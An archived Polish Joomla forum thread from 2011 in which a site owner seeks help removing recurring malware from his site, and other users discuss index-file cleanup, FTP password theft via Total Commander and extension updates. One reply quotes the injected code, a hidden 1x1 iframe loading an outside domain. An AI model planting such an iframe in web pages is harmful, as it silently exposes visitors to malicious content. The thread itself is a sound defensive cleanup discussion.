PDA

Zobacz pełną wersję : Walka z Exploitem na stronie



majas
10-02-2011, 11:44
Witam!
Zarządzam stroną ala.boncol.pl (www.ala.boncol.pl), od jakiś 2 tygodni mamy exploita na stronie. Zaktualizowałem joomle do wersji 1.5.22, zmieniłem hosting na porządniejszy pozmieniane hasła do bazy na admina, itp. Chwile dobrze a po 2 dniach znowu to samo. Straciłem już cierpliwość stąd post na forum. Z góry dziękuje za pomoc i pomysły jak to zło zwalczyć.
pozdrawiam.
Majas

pyziak
10-02-2011, 11:52
to nie exploit , tylko złośliwy kod, jak przeniosłeś stronę na nowy hosting ? starą stronę ? ( odnalazłeś i usunąłeś ten kod ) , a może używasz Total Commandera ( o którym było tak głośno ) ?

ppilus
10-02-2011, 12:10
Wyłącz na trochę stronę i dokonaj przeglądu plików index.html i index.php czy nie ma tam niepożądanych wpisów. Z tego co widać to są.

majas
10-02-2011, 12:15
Witam!
Dzięki za szybką odpowiedź. Indexy były podmieniane wielokrotnie na kopie z przed ataku i ciągle to paskudztwo włazi. Używam total commandera, dzięki za ostrzeżenie zaraz zmienię na innego.
pozdrawiam!

ppilus
10-02-2011, 12:17
Zapomnij o TC jako kliencie ftp. Masz "łobuza" w lokalnej maszynie i TC pomaga ci go przerzucać na hosting. Wystarczy na forum poszukać wątków o TC.

majas
10-02-2011, 12:43
Kompa mam czystego, pliki podmienione innym klientem, na razie jest dobrze. Zobaczymy jak długo. Pozdrawiam i dzięki za pomoc. A tak przy okazji może jeszcze ktoś zerknąć czy indexy są czyste?

mjmartino
10-02-2011, 13:34
Co do tego ma TC jak ktoś ma zabezpieczonego locala to czemu ma nie używać TC ? to że są robaki które potrafią uzyskać hasło z TC nie znaczy że jest on zły... Administruje pare ładnych lat i zawsze używam TC i nigdy mi się nie zdarzył tego typu atak... (robaki potrafią nie tylko z TC pozyskiwać hasła ;) )
Jak się dba to się dba kompleksowo a nie zwala wine na inne narzędzia ;)

Btw. co do rad @majas sprawdz i zaaktualizuj dodatkowo komponenty jakie używasz również jak również moduły oraz pluginy ;)
Aktualizacja bezpieczeństwa nie nie tylko sama JOOMLA!

ppilus
10-02-2011, 14:24
Gdyby każdy nazywający siebie administratorem podchodził do zagadnienia świadomie i odpowiedzialnie, zwracając uwagę na aktualizacje, bezpieczeństwo itd... temat chociażby TC nie wracałby jak bumerang.
Tutaj było o tym http://forum.joomla.pl/showthread.php?26197

trzepiz
10-02-2011, 14:31
Zapomnij o TC jako kliencie ftp
Zupełnie się nie zgadzam. W TC przy dodawaniu nowego połączenia FTP jest taki przycisk "Szyfruj" - przyznam, że to szyfrowanie nie jest "wysokich lotów" ale nie ma możliwości aby jakiś "robal" połączył się z naszymi zapamiętanymi kontami FTP. Nie psioczyć na TC bo używam go od zawsze i jeszcze nie udało mi się zainfekować przy jego pomocy żadnego konta :)

Screenshot (http://z1.przeklej.pl/prze712/58324a2300184aef4d53da50/tc.png)

ppilus
10-02-2011, 14:40
Też go używam od zawsze :) ale jak widać nie każdemu służy.

trzepiz
10-02-2011, 14:43
jak widać nie każdemu służy.
Ale to nie wina TC (w którym można sobie "zaszyfrować" połączenia ) a użytkownika, który nie wie, że coś takiego jest. Użytkownik zawsze jest najsłabszym ogniwem :)

majas
10-02-2011, 14:48
No niestety to nie wina TC. Znowu avast wykrywa exploit, Moduły raczej wszystkie mam aktualne. Nie wiem co dalej. Macie jeszcze jakieś pomysły?

mjmartino
10-02-2011, 15:37
Widocznie coś Ci się dokleja dalej na <iframe> poszukaj my tego niestety nie zrobimy za ciebie To nie exploit tylko malware..

ehh REMOVE!


<body class="body_bg"><iframe src="http://zxstats.com/" width="1" height="1" frameborder="0"></iframe>


jednak zrobiłem to za Ciebie.. zrób porządek wyłącz stronę na trochę i poszukaj jak toś wyżej sugerował!
Poza tym opera mi wykryła że masz Mailware również więc możliwe że trafiłeś na jakaś czarną listę już jesli problem dość długo występuje..

majas
11-02-2011, 14:01
Pousuwałem wszystkie możliwe indexy html a były w każdym podfolderze i w nich wspomniany wcześniej kod. Wyczyściłem index.php i jak na razie chodzi zainstalowałem jeszcze dodatkowo moduł JHackGuard może to coś pomoże.
Dzięki wszystkim za pomoc i mam nadzieje że będzie już dobrze.
pozdrawiam!
Majas:spoko:

tomaszek83
11-02-2011, 14:21
index.html mają być w każdym katalogu, z tym że mają być czyste.

majas
11-02-2011, 14:33
Usunąłem indexy i same się porobiły nowe czyste i pasuje.

tomaszek83
11-02-2011, 14:39
a to ok.